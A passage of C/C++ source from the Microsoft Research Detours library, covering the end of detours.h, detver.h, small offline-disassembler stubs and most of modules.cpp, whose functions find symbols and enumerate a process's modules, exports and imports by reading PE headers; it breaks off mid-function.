Offset); 981 | 982 | BOOL IsMovlGp() const; 983 | 984 | VOID SetInst(BYTE Slot, BYTE nInst); 985 | VOID SetInst0(BYTE nInst); 986 | VOID SetInst1(BYTE nInst); 987 | VOID SetInst2(BYTE nInst); 988 | VOID SetData(BYTE Slot, UINT64 nData); 989 | VOID SetData0(UINT64 nData); 990 | VOID SetData1(UINT64 nData); 991 | VOID SetData2(UINT64 nData); 992 | BOOL SetNop(BYTE Slot); 993 | BOOL SetNop0(); 994 | BOOL SetNop1(); 995 | BOOL 
SetNop2(); 996 | 997 | public: 998 | BOOL IsBrl() const; 999 | VOID SetBrl(); 1000 | VOID SetBrl(UINT64 target); 1001 | UINT64 GetBrlTarget() const; 1002 | VOID SetBrlTarget(UINT64 target); 1003 | VOID SetBrlImm(UINT64 imm); 1004 | UINT64 GetBrlImm() const; 1005 | 1006 | UINT64 GetMovlGp() const; 1007 | VOID SetMovlGp(UINT64 gp); 1008 | 1009 | VOID SetStop(); 1010 | 1011 | UINT Copy(_Out_ DETOUR_IA64_BUNDLE *pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra = NULL) const; 1012 | }; 1013 | #endif // DETOURS_IA64 1014 | 1015 | #ifdef DETOURS_ARM 1016 | 1017 | #define DETOURS_PFUNC_TO_PBYTE(p) ((PBYTE)(((ULONG_PTR)(p)) & ~(ULONG_PTR)1)) 1018 | #define DETOURS_PBYTE_TO_PFUNC(p) ((PBYTE)(((ULONG_PTR)(p)) | (ULONG_PTR)1)) 1019 | 1020 | #endif // DETOURS_ARM 1021 | 1022 | ////////////////////////////////////////////////////////////////////////////// 1023 | 1024 | #ifdef __cplusplus 1025 | extern "C" { 1026 | #endif // __cplusplus 1027 | 1028 | #define DETOUR_OFFLINE_LIBRARY(x) \ 1029 | PVOID WINAPI DetourCopyInstruction##x(_In_opt_ PVOID pDst, \ 1030 | _Inout_opt_ PVOID *ppDstPool, \ 1031 | _In_ PVOID pSrc, \ 1032 | _Out_opt_ PVOID *ppTarget, \ 1033 | _Out_opt_ LONG *plExtra); \ 1034 | \ 1035 | BOOL WINAPI DetourSetCodeModule##x(_In_ HMODULE hModule, \ 1036 | _In_ BOOL fLimitReferencesToModule); \ 1037 | 1038 | DETOUR_OFFLINE_LIBRARY(X86) 1039 | DETOUR_OFFLINE_LIBRARY(X64) 1040 | DETOUR_OFFLINE_LIBRARY(ARM) 1041 | DETOUR_OFFLINE_LIBRARY(ARM64) 1042 | DETOUR_OFFLINE_LIBRARY(IA64) 1043 | 1044 | #undef DETOUR_OFFLINE_LIBRARY 1045 | 1046 | ////////////////////////////////////////////////////////////////////////////// 1047 | // 1048 | // Helpers for manipulating page protection. 
1049 | // 1050 | 1051 | _Success_(return != FALSE) 1052 | BOOL WINAPI DetourVirtualProtectSameExecuteEx(_In_ HANDLE hProcess, 1053 | _In_ PVOID pAddress, 1054 | _In_ SIZE_T nSize, 1055 | _In_ DWORD dwNewProtect, 1056 | _Out_ PDWORD pdwOldProtect); 1057 | 1058 | _Success_(return != FALSE) 1059 | BOOL WINAPI DetourVirtualProtectSameExecute(_In_ PVOID pAddress, 1060 | _In_ SIZE_T nSize, 1061 | _In_ DWORD dwNewProtect, 1062 | _Out_ PDWORD pdwOldProtect); 1063 | #ifdef __cplusplus 1064 | } 1065 | #endif // __cplusplus 1066 | 1067 | ////////////////////////////////////////////////////////////////////////////// 1068 | 1069 | #define MM_ALLOCATION_GRANULARITY 0x10000 1070 | 1071 | ////////////////////////////////////////////////////////////////////////////// 1072 | 1073 | #endif // DETOURS_INTERNAL 1074 | #endif // __cplusplus 1075 | 1076 | #endif // _DETOURS_H_ 1077 | // 1078 | //////////////////////////////////////////////////////////////// End of File. 1079 | -------------------------------------------------------------------------------- /Detours-master/src/detver.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Common version parameters. 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 
//

#define _USING_V110_SDK71_ 1
#include "winver.h"
#if 0
#include <common.ver>
#include <ntverp.h>
#else
#ifndef DETOURS_STRINGIFY
#define DETOURS_STRINGIFY(x)    DETOURS_STRINGIFY_(x)
#define DETOURS_STRINGIFY_(x)    #x
#endif

#define VER_FILEFLAGSMASK   0x3fL
#define VER_FILEFLAGS       0x0L
#define VER_FILEOS          0x00040004L
#define VER_FILETYPE        0x00000002L
#define VER_FILESUBTYPE     0x00000000L
#endif
// Uses the DETOURS_STRINGIFY macro defined above (the upstream file spells it
// DETOUR_STRINGIFY, which is never defined).
#define VER_DETOURS_BITS    DETOURS_STRINGIFY(DETOURS_BITS)
--------------------------------------------------------------------------------
/Detours-master/src/disolarm.cpp:
--------------------------------------------------------------------------------
#define DETOURS_ARM_OFFLINE_LIBRARY
#include "disasm.cpp"
--------------------------------------------------------------------------------
/Detours-master/src/disolarm64.cpp:
--------------------------------------------------------------------------------
#define DETOURS_ARM64_OFFLINE_LIBRARY
#include "disasm.cpp"
--------------------------------------------------------------------------------
/Detours-master/src/disolia64.cpp:
--------------------------------------------------------------------------------
#define DETOURS_IA64_OFFLINE_LIBRARY
#include "disasm.cpp"
--------------------------------------------------------------------------------
/Detours-master/src/disolx64.cpp:
--------------------------------------------------------------------------------
#define DETOURS_X64_OFFLINE_LIBRARY
#include "disasm.cpp"
--------------------------------------------------------------------------------
/Detours-master/src/disolx86.cpp:
--------------------------------------------------------------------------------
#define DETOURS_X86_OFFLINE_LIBRARY
#include "disasm.cpp"
--------------------------------------------------------------------------------
/Detours-master/src/modules.cpp:
-------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Module Enumeration Functions (modules.cpp of detours.lib) 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | // Module enumeration functions. 10 | // 11 | 12 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 13 | 14 | #pragma warning(disable:4068) // unknown pragma (suppress) 15 | 16 | #if _MSC_VER >= 1900 17 | #pragma warning(push) 18 | #pragma warning(disable:4091) // empty typedef 19 | #endif 20 | 21 | #define _ARM_WINAPI_PARTITION_DESKTOP_SDK_AVAILABLE 1 22 | #include 23 | #if (_MSC_VER < 1310) 24 | #else 25 | #pragma warning(push) 26 | #if _MSC_VER > 1400 27 | #pragma warning(disable:6102 6103) // /analyze warnings 28 | #endif 29 | #include 30 | #pragma warning(pop) 31 | #endif 32 | 33 | // #define DETOUR_DEBUG 1 34 | #define DETOURS_INTERNAL 35 | #include "detours.h" 36 | 37 | #if DETOURS_VERSION != 0x4c0c1 // 0xMAJORcMINORcPATCH 38 | #error detours.h version mismatch 39 | #endif 40 | 41 | #if _MSC_VER >= 1900 42 | #pragma warning(pop) 43 | #endif 44 | 45 | #define CLR_DIRECTORY OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] 46 | #define IAT_DIRECTORY OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT] 47 | 48 | ////////////////////////////////////////////////////////////////////////////// 49 | // 50 | const GUID DETOUR_EXE_RESTORE_GUID = { 51 | 0x2ed7a3ff, 0x3339, 0x4a8d, 52 | { 0x80, 0x5c, 0xd4, 0x98, 0x15, 0x3f, 0xc2, 0x8f }}; 53 | 54 | ////////////////////////////////////////////////////////////////////////////// 55 | // 56 | PDETOUR_SYM_INFO DetourLoadImageHlp(VOID) 57 | { 58 | static DETOUR_SYM_INFO symInfo; 59 | static PDETOUR_SYM_INFO pSymInfo = NULL; 60 | static BOOL failed = false; 61 | 62 | if (failed) { 63 | return NULL; 64 | } 65 | if (pSymInfo != NULL) { 
66 | return pSymInfo; 67 | } 68 | 69 | ZeroMemory(&symInfo, sizeof(symInfo)); 70 | // Create a real handle to the process. 71 | #if 0 72 | DuplicateHandle(GetCurrentProcess(), 73 | GetCurrentProcess(), 74 | GetCurrentProcess(), 75 | &symInfo.hProcess, 76 | 0, 77 | FALSE, 78 | DUPLICATE_SAME_ACCESS); 79 | #else 80 | symInfo.hProcess = GetCurrentProcess(); 81 | #endif 82 | 83 | symInfo.hDbgHelp = LoadLibraryExW(L"dbghelp.dll", NULL, 0); 84 | if (symInfo.hDbgHelp == NULL) { 85 | abort: 86 | failed = true; 87 | if (symInfo.hDbgHelp != NULL) { 88 | FreeLibrary(symInfo.hDbgHelp); 89 | } 90 | symInfo.pfImagehlpApiVersionEx = NULL; 91 | symInfo.pfSymInitialize = NULL; 92 | symInfo.pfSymSetOptions = NULL; 93 | symInfo.pfSymGetOptions = NULL; 94 | symInfo.pfSymLoadModule64 = NULL; 95 | symInfo.pfSymGetModuleInfo64 = NULL; 96 | symInfo.pfSymFromName = NULL; 97 | return NULL; 98 | } 99 | 100 | symInfo.pfImagehlpApiVersionEx 101 | = (PF_ImagehlpApiVersionEx)GetProcAddress(symInfo.hDbgHelp, 102 | "ImagehlpApiVersionEx"); 103 | symInfo.pfSymInitialize 104 | = (PF_SymInitialize)GetProcAddress(symInfo.hDbgHelp, "SymInitialize"); 105 | symInfo.pfSymSetOptions 106 | = (PF_SymSetOptions)GetProcAddress(symInfo.hDbgHelp, "SymSetOptions"); 107 | symInfo.pfSymGetOptions 108 | = (PF_SymGetOptions)GetProcAddress(symInfo.hDbgHelp, "SymGetOptions"); 109 | symInfo.pfSymLoadModule64 110 | = (PF_SymLoadModule64)GetProcAddress(symInfo.hDbgHelp, "SymLoadModule64"); 111 | symInfo.pfSymGetModuleInfo64 112 | = (PF_SymGetModuleInfo64)GetProcAddress(symInfo.hDbgHelp, "SymGetModuleInfo64"); 113 | symInfo.pfSymFromName 114 | = (PF_SymFromName)GetProcAddress(symInfo.hDbgHelp, "SymFromName"); 115 | 116 | API_VERSION av; 117 | ZeroMemory(&av, sizeof(av)); 118 | av.MajorVersion = API_VERSION_NUMBER; 119 | 120 | if (symInfo.pfImagehlpApiVersionEx == NULL || 121 | symInfo.pfSymInitialize == NULL || 122 | symInfo.pfSymLoadModule64 == NULL || 123 | symInfo.pfSymGetModuleInfo64 == NULL || 124 | 
        symInfo.pfSymFromName == NULL) {
        goto abort;
    }

    symInfo.pfImagehlpApiVersionEx(&av);
    if (av.MajorVersion < API_VERSION_NUMBER) {
        goto abort;
    }

    if (!symInfo.pfSymInitialize(symInfo.hProcess, NULL, FALSE)) {
        // We won't retry the initialize if it fails.
        goto abort;
    }

    if (symInfo.pfSymGetOptions != NULL && symInfo.pfSymSetOptions != NULL) {
        DWORD dw = symInfo.pfSymGetOptions();

        dw &= ~(SYMOPT_CASE_INSENSITIVE |
                SYMOPT_UNDNAME |
                SYMOPT_DEFERRED_LOADS |
                0);
        dw |= (
#if defined(SYMOPT_EXACT_SYMBOLS)
               SYMOPT_EXACT_SYMBOLS |
#endif
#if defined(SYMOPT_NO_UNQUALIFIED_LOADS)
               SYMOPT_NO_UNQUALIFIED_LOADS |
#endif
               SYMOPT_DEFERRED_LOADS |
#if defined(SYMOPT_FAIL_CRITICAL_ERRORS)
               SYMOPT_FAIL_CRITICAL_ERRORS |
#endif
#if defined(SYMOPT_INCLUDE_32BIT_MODULES)
               SYMOPT_INCLUDE_32BIT_MODULES |
#endif
               0);
        symInfo.pfSymSetOptions(dw);
    }

    pSymInfo = &symInfo;
    return pSymInfo;
}

PVOID WINAPI DetourFindFunction(_In_ PCSTR pszModule,
                                _In_ PCSTR pszFunction)
{
    /////////////////////////////////////////////// First, try GetProcAddress.
    //
#pragma prefast(suppress:28752, "We don't do the unicode conversion for LoadLibraryExA.")
    HMODULE hModule = LoadLibraryExA(pszModule, NULL, 0);
    if (hModule == NULL) {
        return NULL;
    }

    PBYTE pbCode = (PBYTE)GetProcAddress(hModule, pszFunction);
    if (pbCode) {
        return pbCode;
    }

    ////////////////////////////////////////////////////// Then try ImageHelp.
    //
    DETOUR_TRACE(("DetourFindFunction(%hs, %hs)\n", pszModule, pszFunction));
    PDETOUR_SYM_INFO pSymInfo = DetourLoadImageHlp();
    if (pSymInfo == NULL) {
        DETOUR_TRACE(("DetourLoadImageHlp failed: %d\n",
                      GetLastError()));
        return NULL;
    }

    if (pSymInfo->pfSymLoadModule64(pSymInfo->hProcess, NULL,
                                    (PCHAR)pszModule, NULL,
                                    (DWORD64)hModule, 0) == 0) {
        if (ERROR_SUCCESS != GetLastError()) {
            DETOUR_TRACE(("SymLoadModule64(%p) failed: %d\n",
                          pSymInfo->hProcess, GetLastError()));
            return NULL;
        }
    }

    HRESULT hrRet;
    CHAR szFullName[512];
    IMAGEHLP_MODULE64 modinfo;
    ZeroMemory(&modinfo, sizeof(modinfo));
    modinfo.SizeOfStruct = sizeof(modinfo);
    if (!pSymInfo->pfSymGetModuleInfo64(pSymInfo->hProcess, (DWORD64)hModule, &modinfo)) {
        DETOUR_TRACE(("SymGetModuleInfo64(%p, %p) failed: %d\n",
                      pSymInfo->hProcess, hModule, GetLastError()));
        return NULL;
    }

    hrRet = StringCchCopyA(szFullName, sizeof(szFullName)/sizeof(CHAR), modinfo.ModuleName);
    if (FAILED(hrRet)) {
        DETOUR_TRACE(("StringCchCopyA failed: %08x\n", hrRet));
        return NULL;
    }
    hrRet = StringCchCatA(szFullName, sizeof(szFullName)/sizeof(CHAR), "!");
    if (FAILED(hrRet)) {
        DETOUR_TRACE(("StringCchCatA failed: %08x\n", hrRet));
        return NULL;
    }
    hrRet = StringCchCatA(szFullName, sizeof(szFullName)/sizeof(CHAR), pszFunction);
    if (FAILED(hrRet)) {
        DETOUR_TRACE(("StringCchCatA failed: %08x\n", hrRet));
        return NULL;
    }

    struct CFullSymbol : SYMBOL_INFO {
        CHAR szRestOfName[512];
    } symbol;
    ZeroMemory(&symbol, sizeof(symbol));
    //symbol.ModBase = (ULONG64)hModule;
    symbol.SizeOfStruct = sizeof(SYMBOL_INFO);
#ifdef DBHLPAPI
    symbol.MaxNameLen = sizeof(symbol.szRestOfName)/sizeof(symbol.szRestOfName[0]);
#else
    symbol.MaxNameLength
        = sizeof(symbol.szRestOfName)/sizeof(symbol.szRestOfName[0]);
#endif

    if (!pSymInfo->pfSymFromName(pSymInfo->hProcess, szFullName, &symbol)) {
        DETOUR_TRACE(("SymFromName(%hs) failed: %d\n", szFullName, GetLastError()));
        return NULL;
    }

#if defined(DETOURS_IA64)
    // On the IA64, we get a raw code pointer from the symbol engine
    // and have to convert it to a wrapped [code pointer, global pointer].
    //
    PPLABEL_DESCRIPTOR pldEntry = (PPLABEL_DESCRIPTOR)DetourGetEntryPoint(hModule);
    PPLABEL_DESCRIPTOR pldSymbol = new PLABEL_DESCRIPTOR;

    pldSymbol->EntryPoint = symbol.Address;
    pldSymbol->GlobalPointer = pldEntry->GlobalPointer;
    return (PBYTE)pldSymbol;
#elif defined(DETOURS_ARM)
    // On the ARM, we get a raw code pointer, which we must convert into a
    // valid Thumb2 function pointer.
    return DETOURS_PBYTE_TO_PFUNC(symbol.Address);
#else
    return (PBYTE)symbol.Address;
#endif
}

//////////////////////////////////////////////////// Module Image Functions.
//

HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast)
{
    PBYTE pbLast = (PBYTE)hModuleLast + MM_ALLOCATION_GRANULARITY;

    MEMORY_BASIC_INFORMATION mbi;
    ZeroMemory(&mbi, sizeof(mbi));

    // Find the next memory region that contains a mapped PE image.
    //
    for (;; pbLast = (PBYTE)mbi.BaseAddress + mbi.RegionSize) {
        if (VirtualQuery(pbLast, &mbi, sizeof(mbi)) <= 0) {
            break;
        }

        // Skip uncommitted regions and guard pages.
        //
        if ((mbi.State != MEM_COMMIT) ||
            ((mbi.Protect & 0xff) == PAGE_NOACCESS) ||
            (mbi.Protect & PAGE_GUARD)) {
            continue;
        }

        __try {
            PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pbLast;
            if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE ||
                (DWORD)pDosHeader->e_lfanew > mbi.RegionSize ||
                (DWORD)pDosHeader->e_lfanew < sizeof(*pDosHeader)) {
                continue;
            }

            PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                              pDosHeader->e_lfanew);
            if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
                continue;
            }

            return (HMODULE)pDosHeader;
        }
#pragma prefast(suppress:28940, "A bad pointer means this probably isn't a PE header.")
        __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
                 EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
            continue;
        }
    }
    return NULL;
}

PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule)
{
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (hModule == NULL) {
        pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL);
    }

    __try {
#pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL.
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return NULL;
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return NULL;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return NULL;
        }

        PDETOUR_CLR_HEADER pClrHeader = NULL;
        if (pNtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
            if (((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.VirtualAddress != 0 &&
                ((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.Size != 0) {
                pClrHeader = (PDETOUR_CLR_HEADER)
                    (((PBYTE)pDosHeader)
                     + ((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.VirtualAddress);
            }
        }
        else if (pNtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
            if (((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.VirtualAddress != 0 &&
                ((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.Size != 0) {
                pClrHeader = (PDETOUR_CLR_HEADER)
                    (((PBYTE)pDosHeader)
                     + ((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.VirtualAddress);
            }
        }

        if (pClrHeader != NULL) {
            // For MSIL assemblies, we want to use the _Cor entry points.

            HMODULE hClr = GetModuleHandleW(L"MSCOREE.DLL");
            if (hClr == NULL) {
                return NULL;
            }

            SetLastError(NO_ERROR);
            return GetProcAddress(hClr, "_CorExeMain");
        }

        SetLastError(NO_ERROR);

        // Pure resource DLLs have neither an entry point nor CLR information
        // so handle them by returning NULL (LastError is NO_ERROR)
        if (pNtHeader->OptionalHeader.AddressOfEntryPoint == 0) {
            return NULL;
        }

        return ((PBYTE)pDosHeader) +
            pNtHeader->OptionalHeader.AddressOfEntryPoint;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return NULL;
    }
}

ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule)
{
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (hModule == NULL) {
        pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL);
    }

    __try {
#pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL.
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return 0;   // ULONG result: 0 rather than NULL on failure.
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return 0;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return 0;
        }
        SetLastError(NO_ERROR);

        return (pNtHeader->OptionalHeader.SizeOfImage);
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return 0;
    }
}

HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr)
{
    MEMORY_BASIC_INFORMATION mbi;
    ZeroMemory(&mbi, sizeof(mbi));

    __try {
        if (VirtualQuery(pvAddr, &mbi, sizeof(mbi)) <= 0) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return NULL;
        }

        // Skip uncommitted regions and guard pages.
        //
        if ((mbi.State != MEM_COMMIT) ||
            ((mbi.Protect & 0xff) == PAGE_NOACCESS) ||
            (mbi.Protect & PAGE_GUARD)) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return NULL;
        }

        PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)mbi.AllocationBase;
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return NULL;
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return NULL;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return NULL;
        }
        SetLastError(NO_ERROR);

        return (HMODULE)pDosHeader;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_INVALID_EXE_SIGNATURE);
        return NULL;
    }
}


static inline PBYTE RvaAdjust(_Pre_notnull_ PIMAGE_DOS_HEADER pDosHeader, _In_ DWORD raddr)
{
    if (raddr != NULL) {
        return ((PBYTE)pDosHeader) + raddr;
    }
    return NULL;
}

BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule,
                                   _In_opt_ PVOID pContext,
                                   _In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport)
{
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (hModule == NULL) {
        pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL);
    }

    __try {
#pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL.
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return FALSE;   // BOOL result: FALSE rather than NULL on failure.
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return FALSE;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return FALSE;
        }

        PIMAGE_EXPORT_DIRECTORY pExportDir
            = (PIMAGE_EXPORT_DIRECTORY)
            RvaAdjust(pDosHeader,
                      pNtHeader->OptionalHeader
                      .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

        if (pExportDir == NULL) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return FALSE;
        }

        PBYTE pExportDirEnd = (PBYTE)pExportDir + pNtHeader->OptionalHeader
            .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
        PDWORD pdwFunctions = (PDWORD)RvaAdjust(pDosHeader, pExportDir->AddressOfFunctions);
        PDWORD pdwNames = (PDWORD)RvaAdjust(pDosHeader, pExportDir->AddressOfNames);
        PWORD pwOrdinals = (PWORD)RvaAdjust(pDosHeader,
                                           pExportDir->AddressOfNameOrdinals);

        for (DWORD nFunc = 0; nFunc < pExportDir->NumberOfFunctions; nFunc++) {
            PBYTE pbCode = (pdwFunctions != NULL)
                ? (PBYTE)RvaAdjust(pDosHeader, pdwFunctions[nFunc]) : NULL;
            PCHAR pszName = NULL;

            // if the pointer is in the export region, then it is a forwarder.
            if (pbCode > (PBYTE)pExportDir && pbCode < pExportDirEnd) {
                pbCode = NULL;
            }

            for (DWORD n = 0; n < pExportDir->NumberOfNames; n++) {
                if (pwOrdinals[n] == nFunc) {
                    pszName = (pdwNames != NULL)
                        ? (PCHAR)RvaAdjust(pDosHeader, pdwNames[n]) : NULL;
                    break;
                }
            }
            ULONG nOrdinal = pExportDir->Base + nFunc;

            if (!pfExport(pContext, nOrdinal, pszName, pbCode)) {
                break;
            }
        }
        SetLastError(NO_ERROR);
        return TRUE;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return FALSE;   // BOOL result: FALSE rather than NULL on failure.
    }
}

BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule,
                                     _In_opt_ PVOID pContext,
                                     _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile,
                                     _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFunc)
{
    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (hModule == NULL) {
        pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL);
    }

    __try {
#pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL.
        if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            return FALSE;
        }

        PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader +
                                                          pDosHeader->e_lfanew);
        if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            return FALSE;
        }
        if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return FALSE;
        }

        PIMAGE_IMPORT_DESCRIPTOR iidp
            = (PIMAGE_IMPORT_DESCRIPTOR)
            RvaAdjust(pDosHeader,
                      pNtHeader->OptionalHeader
                      .DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

        if (iidp == NULL) {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            return FALSE;
        }

        for (; iidp->OriginalFirstThunk != 0; iidp++) {

            PCSTR pszName = (PCHAR)RvaAdjust(pDosHeader, iidp->Name);
            if (pszName == NULL) {
                SetLastError(ERROR_EXE_MARKED_INVALID);
                return FALSE;
            }

            PIMAGE_THUNK_DATA pThunks = (PIMAGE_THUNK_DATA)
                RvaAdjust(pDosHeader, iidp->OriginalFirstThunk);
            PVOID * pAddrs = (PVOID *)
                RvaAdjust(pDosHeader, iidp->FirstThunk);

            HMODULE hFile = DetourGetContainingModule(pAddrs[0]);

            if (pfImportFile != NULL) {
                if (!pfImportFile(pContext, hFile, pszName)) {
                    break;
                }
            }

            DWORD nNames = 0;
            if (pThunks) {
                for (; pThunks[nNames].u1.Ordinal; nNames++) {
                    DWORD nOrdinal = 0;
                    PCSTR pszFunc = NULL;

                    if (IMAGE_SNAP_BY_ORDINAL(pThunks[nNames].u1.Ordinal)) {
                        nOrdinal = (DWORD)IMAGE_ORDINAL(pThunks[nNames].u1.Ordinal);
                    }
                    else {
                        pszFunc = (PCSTR)RvaAdjust(pDosHeader,
                                                   (DWORD)pThunks[nNames].u1.AddressOfData + 2);
                    }

                    if (pfImportFunc != NULL) {
                        if (!pfImportFunc(pContext,
                                          nOrdinal,
                                          pszFunc,
                                          &pAddrs[nNames])) {
                            break;
                        }
                    }
                }
                if (pfImportFunc != NULL) {
                    pfImportFunc(pContext, 0, NULL, NULL);
                }
            }
        }
        if (pfImportFile != NULL) {
            pfImportFile(pContext, NULL, NULL);
        }
        SetLastError(NO_ERROR);
        return TRUE;
    }
    __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
        SetLastError(ERROR_EXE_MARKED_INVALID);
        return FALSE;
    }
}

// Context for DetourEnumerateImportsThunk, which adapts "regular" callbacks for use with "Ex".
struct _DETOUR_ENUMERATE_IMPORTS_THUNK_CONTEXT
{
    PVOID pContext;
    PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc;
};

// Callback for DetourEnumerateImportsEx that adapts DetourEnumerateImportsEx
// for use with a DetourEnumerateImports callback -- dereference the IAT and pass the value on.

static
BOOL
CALLBACK
DetourEnumerateImportsThunk(_In_ PVOID VoidContext,
                            _In_ DWORD nOrdinal,
                            _In_opt_ PCSTR pszFunc,
                            _In_opt_ PVOID* ppvFunc)
{
